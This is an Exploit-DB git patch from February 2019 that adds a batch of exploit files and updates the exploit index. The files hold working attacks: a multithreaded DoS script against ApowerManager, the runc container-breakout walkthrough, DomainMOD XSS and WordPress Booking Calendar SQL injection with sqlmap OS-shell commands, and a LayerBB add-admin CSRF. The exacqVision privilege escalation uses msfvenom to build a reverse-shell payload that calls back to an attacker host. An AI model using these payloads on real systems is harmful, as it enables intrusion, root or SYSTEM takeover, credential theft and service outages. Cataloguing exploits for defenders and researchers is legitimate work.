From 5f3f5c8f0985317025d46b28d96c97a37f0ae540 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 15 Feb 2019 05:01:54 +0000 Subject: [PATCH] DB: 2019-02-15 18 changes to exploits/shellcodes Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC) MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) exacqVision ESM 5.12.2 - Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin) --- exploits/android/dos/46380.py | 49 ++++++++++++++++ exploits/hardware/webapps/46363.txt | 33 ----------- exploits/hardware/webapps/46364.txt | 41 ------------- exploits/hardware/webapps/46365.txt | 90 ----------------------------- exploits/linux/local/46369.md | 81 ++++++++++++++++++++++++++ exploits/php/webapps/46372.txt | 16 +++++ exploits/php/webapps/46373.txt | 16 +++++ exploits/php/webapps/46374.txt | 16 +++++ exploits/php/webapps/46375.txt | 14 +++++ exploits/php/webapps/46376.txt | 15 +++++ exploits/php/webapps/46377.txt | 58 +++++++++++++++++++ exploits/php/webapps/46379.txt | 38 ++++++++++++ exploits/windows/dos/46371.py | 26 +++++++++ exploits/windows/dos/46378.py | 24 ++++++++ exploits/windows/local/46370.txt | 75 ++++++++++++++++++++++++ files_exploits.csv | 17 ++++-- 16 files changed, 441 insertions(+), 168 deletions(-) create mode 100755 exploits/android/dos/46380.py delete mode 100644 exploits/hardware/webapps/46363.txt delete mode 100644 exploits/hardware/webapps/46364.txt delete mode 100644 exploits/hardware/webapps/46365.txt create mode 100644 exploits/linux/local/46369.md create mode 100644 exploits/php/webapps/46372.txt create mode 100644 exploits/php/webapps/46373.txt create mode 100644 exploits/php/webapps/46374.txt create mode 100644 exploits/php/webapps/46375.txt create mode 100644 exploits/php/webapps/46376.txt create mode 100644 exploits/php/webapps/46377.txt create mode 100644 exploits/php/webapps/46379.txt create mode 100755 exploits/windows/dos/46371.py create mode 100755 exploits/windows/dos/46378.py create mode 100644 exploits/windows/local/46370.txt diff --git a/exploits/android/dos/46380.py b/exploits/android/dos/46380.py new file mode 100755 index 000000000..735b24dc7 --- /dev/null +++ b/exploits/android/dos/46380.py @@ -0,0 +1,49 @@ +#!/usr/bin/python +#coding: utf-8 + +# ********************************************************************* +# * Author: Marcelo Vázquez (aka s4vitar) * +# * ApowerManager Remote Denial of Service (DoS) / Application Crash * +# ********************************************************************* + +# Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash +# Date: 2019-02-14 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Vendor Homepage: https://www.apowersoft.com/phone-manager +# Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/ +# Version: <= ApowerManager - Phone Manager 3.1.7 +# Tested on: Android + +import sys, requests, threading, signal + +def handler(signum, frame): + print '\nFinishing program...\n' + sys.exit(0) + +if len(sys.argv) != 3: + print "\nUsage: python " + sys.argv[0] + " \n" + print "Example: python apowermanager_dos.py 192.168.1.125 2333\n" + sys.exit(0) + +def startAttack(url): + url_destination = url + '/?Key=PhoneRequestAuthorization' + headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'} + + r = requests.post(url_destination, headers=headers) + +if __name__ == '__main__': + + signal.signal(signal.SIGINT, handler) + url = 'http://' + sys.argv[1] + ':' + sys.argv[2] + + threads = [] + + for i in xrange(0, 10000): + t = threading.Thread(target=startAttack, args=(url,)) + threads.append(t) + + for x in threads: + x.start() + + for x in threads: + x.join() \ No newline at end of file diff --git a/exploits/hardware/webapps/46363.txt b/exploits/hardware/webapps/46363.txt deleted file mode 100644 index 6c03a845c..000000000 --- a/exploits/hardware/webapps/46363.txt +++ /dev/null @@ -1,33 +0,0 @@ -# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting -# Date: 12.02.2019 -# Exploit Author: Ronnie T Baby -# Contact:https://www.linkedin.com/in/ronnietbaby -# Vendor Homepage: www.jio.com -# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 -# Category: Hardware (Wifi Router) -# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 -# Tested on: Ubuntu 18.04 -# CVE: CVE-2019-7687 - - -Description: -cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data. - -1. Create a poc.html and insert - - - - -
- - - - -
- d - - -2. Send to victim(who is connected to the wifi network). -3. Post based Xss gets fired . - -Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC. \ No newline at end of file diff --git a/exploits/hardware/webapps/46364.txt b/exploits/hardware/webapps/46364.txt deleted file mode 100644 index adfb7c565..000000000 --- a/exploits/hardware/webapps/46364.txt +++ /dev/null @@ -1,41 +0,0 @@ -# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password -# Date: 12.02.2019 -# Exploit Author: Ronnie T Baby -# Contact:https://www.linkedin.com/in/ronnietbaby -# Vendor Homepage: www.jio.com -# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 -# Category: Hardware (Wifi Router) -# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 -# Tested on: Ubuntu 18.04 -# CVE: CVE-2019-7745 - -Description: - -JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field. - -POC- -1. Create a view.html and insert - - - - -
- - - - -
- - - - -2. Send to victim(who is connected to the wifi network). -3. The response gives the current wifi password. - Example response- - -{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID", -"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES", -"wpa_security_key":"leakedpassword",".....etc} - - -Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this. \ No newline at end of file diff --git a/exploits/hardware/webapps/46365.txt b/exploits/hardware/webapps/46365.txt deleted file mode 100644 index c056922a1..000000000 --- a/exploits/hardware/webapps/46365.txt +++ /dev/null @@ -1,90 +0,0 @@ -# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router -# Date: 12.02.2019 -# Exploit Author: Ronnie T Baby -# Contact:https://www.linkedin.com/in/ronnietbaby -# Vendor Homepage: www.jio.com -# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 -# Category: Hardware (Wifi Router) -# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 -# Tested on: Ubuntu 18.04 -# CVE: CVE-2019-7746 - -Description: - -JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset. - -POC- - -The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router. - -1. First get admin tokens - - - - -
- - -
- - - - - Example response- - -{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"} - -Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router. - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - -
- - - -Wifi Password changed to Iamhacked - -Choice B) Perform Remote Factory Reset - - - - -
- - - -
- - - -The router reboots to default settings. - - -Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this. \ No newline at end of file diff --git a/exploits/linux/local/46369.md b/exploits/linux/local/46369.md new file mode 100644 index 000000000..f1ed3cd1d --- /dev/null +++ b/exploits/linux/local/46369.md @@ -0,0 +1,81 @@ +## CVE-2019-5736 ## + +This is exploit code for CVE-2019-5736 (and it works for both runc and LXC). +The simplest way to use it is to copy the exploit code into an existing +container, and run `make.sh`. However, you could just as easily create a bad +image and run that. + +```console +% docker run --rm --name pwnme -dit ubuntu:18.10 bash +pwnme +% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar +``` + +We need to install `gcc` to build the exploit, and `runc` because we need to +have the shared libraries that `runc` would use. We don't actually use the +`runc` binary itself. For LXC, you would install `lxc` instead of `runc`. + +```console +% docker attach pwnme +# apt-get update && apt-get install -y gcc runc +[ snip ] +# tar xf CVE-2019-5736.tar +# ./CVE-2019-5736/make.sh +``` + +And now, `/bin/bash` in the container will be able to **overwrite the host runc +binary**. Since this binary is often executed by `root`, this allows for +root-level code execution on the host. + +``` +% docker exec -it pwnme /bin/bash +[+] bad_libseccomp.so booted. +[+] opened ro /proc/self/exe <3>. +[+] constructed fdpath +[+] bad_init is ready -- see for logs. +[*] dying to allow /proc/self/exe to be unused... +% cat /usr/sbin/docker-runc +#!/bin/bash +touch /w00t_w00t ; cat /etc/shadow +``` + +And now if you try to use Docker normally, the malicious script will execute +with root privileges: + +``` +% docker exec -it pwnme /bin/good_bash +OCI runtime state failed: invalid character 'b' looking for beginning of value: unknown +% file /w00t_w00t +/w00t_w00t: empty +``` + +And obviously `make.sh` can be modified to make the evil path anything you +like. If you want to get access to the container, use `/bin/good_bash`. + +### License ### + +``` +Copyright (C) 2019 Aleksa Sarai +Vulnerability discovered by Adam Iwaniuk and Borys Popławski. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to +deal in the Software without restriction, including without limitation the +rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +sell copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +* The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +IN THE SOFTWARE. +``` + + +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip \ No newline at end of file diff --git a/exploits/php/webapps/46372.txt b/exploits/php/webapps/46372.txt new file mode 100644 index 000000000..cd069545a --- /dev/null +++ b/exploits/php/webapps/46372.txt @@ -0,0 +1,16 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-20009 + +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/add/ssl-provider.php page and inject a javascript XSS payload +in ssl-provider-name, ssl-provider's-url "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/88 \ No newline at end of file diff --git a/exploits/php/webapps/46373.txt b/exploits/php/webapps/46373.txt new file mode 100644 index 000000000..6226c022e --- /dev/null +++ b/exploits/php/webapps/46373.txt @@ -0,0 +1,16 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-20010 + +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/add/ssl-provider-account.php page and inject a javascript XSS +payload in username field "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/88 \ No newline at end of file diff --git a/exploits/php/webapps/46374.txt b/exploits/php/webapps/46374.txt new file mode 100644 index 000000000..63dfa2da2 --- /dev/null +++ b/exploits/php/webapps/46374.txt @@ -0,0 +1,16 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-20011 + +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/add/category.php page and inject a javascript XSS payload in +CatagoryName, StakeHolder fields "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/88 \ No newline at end of file diff --git a/exploits/php/webapps/46375.txt b/exploits/php/webapps/46375.txt new file mode 100644 index 000000000..d046610e3 --- /dev/null +++ b/exploits/php/webapps/46375.txt @@ -0,0 +1,14 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-19914 +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the + /assets/add/dns.php page and inject a javascript XSS payload in +Profile Name & notes fields "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/87 \ No newline at end of file diff --git a/exploits/php/webapps/46376.txt b/exploits/php/webapps/46376.txt new file mode 100644 index 000000000..017edd3fd --- /dev/null +++ b/exploits/php/webapps/46376.txt @@ -0,0 +1,15 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Kareem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-19915 +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/edit/host.php?whid=5 page and inject a javascript XSS payload +in "Web Host Name" & "Web Host's url fields "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/87 \ No newline at end of file diff --git a/exploits/php/webapps/46377.txt b/exploits/php/webapps/46377.txt new file mode 100644 index 000000000..7b37b452e --- /dev/null +++ b/exploits/php/webapps/46377.txt @@ -0,0 +1,58 @@ +# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability +# Date: 2018-12-28 +# Exploit Author: B0UG +# Vendor Homepage: https://wpbookingcalendar.com/ +# Software Link: https://wordpress.org/plugins/booking/ +# Version: Tested on version 8.4.3 (older versions may also be affected) +# Tested on: WordPress +# Category : Webapps +# CVE: CVE-2018-20556 + +#I. VULNERABILITY + +Authenticated SQL Injection + +#II. BACKGROUND +'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations. + +#III. DESCRIPTION +An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. + +#IV. PROOF OF CONCEPT +1) Access WordPress control panel. +2) Navigate to the Booking Calendar plugin page. +3) Set up Burp Suite to capture the traffic. +4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry. +5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'. +6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: +• Boolean based blind injection +• Error based injection +• Time based injection + +7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below. +action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67 + +Obtaining a shell using sqlmap +----------------------- +• Obtain a SQL Shell +Sqlmap –r post-request.txt –p booking_id --sql-shell + +• Obtain a Linux Shell +Sqlmap –r post-request.txt –p booking_id --os-shell + +• Obtain a Windows Command Prompt +Sqlmap –r post-request.txt –p booking_id --os-cmd + +#V. IMPACT +The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability. + +#VI. SYSTEMS AFFECTED +WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected). + +#VII. REMEDIATION +Uninstall the plugin until the vulnerability has been fixed by the developer. + +#VIII. DISCLOSURE TIMELINE +#December 28, 2018 1: Vulnerability identified. +#December 28, 2018 2: Informed developer of the vulnerability. +#February 14, 2019 3: No communication received back from the developer. \ No newline at end of file diff --git a/exploits/php/webapps/46379.txt b/exploits/php/webapps/46379.txt new file mode 100644 index 000000000..032f7ed16 --- /dev/null +++ b/exploits/php/webapps/46379.txt @@ -0,0 +1,38 @@ +# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery +# Date: 10/4/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://forum.layerbb.com +# Version: 1.1.2 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-17996 + + +1. Description: +LayerBB is a free open-source forum software, the CSRF allows creating a admin user. + + +2. Proof of Concept: + + + + +
+ + + + + + +
+

+ +
+ + + + + +3. Solution: +Update to 1.1.3 \ No newline at end of file diff --git a/exploits/windows/dos/46371.py b/exploits/windows/dos/46371.py new file mode 100755 index 000000000..3a73779f7 --- /dev/null +++ b/exploits/windows/dos/46371.py @@ -0,0 +1,26 @@ +#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-02-13 +#Vendor Homepage: http://www.coreftp.com/ +#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe +#Tested Version: v2-Build 673 +#Tested on: Windows 7 Service Pack 1 x32 + +#Steps to produce the crash: +#1.- Run python code: Core_FTP_SFTP_Server_1.2.py +#2.- Open core_code.txt and copy content to clipboard +#3.- Open Core FTP Server +#4.- Select "Setup" > "New" +#5.- Select "Domain Name" and Put "Test" +#6.- Select "Domain IP/Address" and Put "1.1.1.1" +#7.- Select "Base directory" and Choose a directory path +#8.- Enable "WinNT users" +#9.- Select "User domain" and Paste Clipboard +#10.- Click on "Ok" and the next window click "Ok" +#11.- Crashed + +cod = "\x41" * 7000 + +f = open('core_code.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46378.py b/exploits/windows/dos/46378.py new file mode 100755 index 000000000..871bab660 --- /dev/null +++ b/exploits/windows/dos/46378.py @@ -0,0 +1,24 @@ +# -*- coding: utf-8 -*- +# Exploit Title: MediaMonkey 4.1.23 - URL Denial of Service (PoC) +# Date: 13/02/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://www.mediamonkey.com/ +# Software Link: https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe +# Version: 4.1.23.1881 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "MediaMonkey.py", it will create a new file "PoC.mp3" +# 2.- Open MediaMonkey.exe +# 3.- Go to File > Open URL or File... +# 4.- Click on button -> Browse... and select the 'PoC.mp3' file created +# 5.- Crashed + +buffer = "http://127.0.0.1/" +badstr = "\x41" * 4000 +buffer += badstr +buffer += ".mp3" + +f = open ("PoC.mp3", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/46370.txt b/exploits/windows/local/46370.txt new file mode 100644 index 000000000..c1fec8321 --- /dev/null +++ b/exploits/windows/local/46370.txt @@ -0,0 +1,75 @@ +# Exploit Title: exacqVision ESM 5.12.2 - Privilege Escalation +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 2019-02-13 +# Vulnerable Software: +# http://cdnpublic.exacq.com/5.12/exacqVisionEnterpriseSystemManager_5.12.2.150128_x86.exe +# Vendor Homepage: https://www.exacq.com +# Version: 5.12.2.150128 +# Tested Windows 7 SP1 x86 and Windows 10 x64 + +# Description: +# exacqVision ESM 5.12.2 suffers from Privilege Escalation due to insecure file permissions + +# Prerequisites +# Local, Low privilege access with restart capabilities + +# Details +# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. +# A low privilege account is able to rename the enterprisesystemmanager.exe file located in +# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service +# through the application, a restart of the computer triggers the execution of the malicious file. + +# note: during install, you cannot choose a folder containing spaces i.e. "program files" + +C:\>icacls exacqVisionEsm +exacqVisionEsm NT AUTHORITY\NETWORK SERVICE:(RX) + win7-32bit\bob:(RX) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) + NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) + +Successfully processed 1 files; Failed processing 0 files + + +C:\>sc qc "exacqVision Enterprise System Manager Web Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: exacqVision Enterprise System Manager Web Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ESMWebService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +# Proof of Concept +1. Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -nlvvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.0.163/enterprisesystemmanager.exe and download + +4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe + enterprisesystemmanager.exe > enterprisesystemmanager.bak + +5. Copy/Move downloaded enterprisesystemmanager.exe file to C:\exacqVisionEsm\EnterpriseSystemManager\ + +6. Restart victim machine and login as low privileged user + +7. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 201b7f482..65deb8a42 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6307,6 +6307,9 @@ id,file,description,date,author,type,platform,port 46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android, 46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80 46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows, +46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows, +46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows, +46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10294,9 +10297,11 @@ id,file,description,date,author,type,platform,port 46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux, 46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows, 46346,exploits/windows/local/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,local,windows, -46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux, +46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)",2019-02-12,feexd,local,linux, 46361,exploits/linux/local/46361.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)",2019-02-13,"Chris Moberly",local,linux, 46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux, +46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows, +46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40819,8 +40824,6 @@ id,file,description,date,author,type,platform,port 46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80 46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi, 46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware, -46363,exploits/hardware/webapps/46363.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting",2019-02-13,"Ronnie T Baby",webapps,hardware,80 -46364,exploits/hardware/webapps/46364.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80 46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443 46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80 46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php, @@ -40830,6 +40833,12 @@ id,file,description,date,author,type,platform,port 46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux, 46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx, 46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80 -46365,exploits/hardware/webapps/46365.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80 46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80 46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 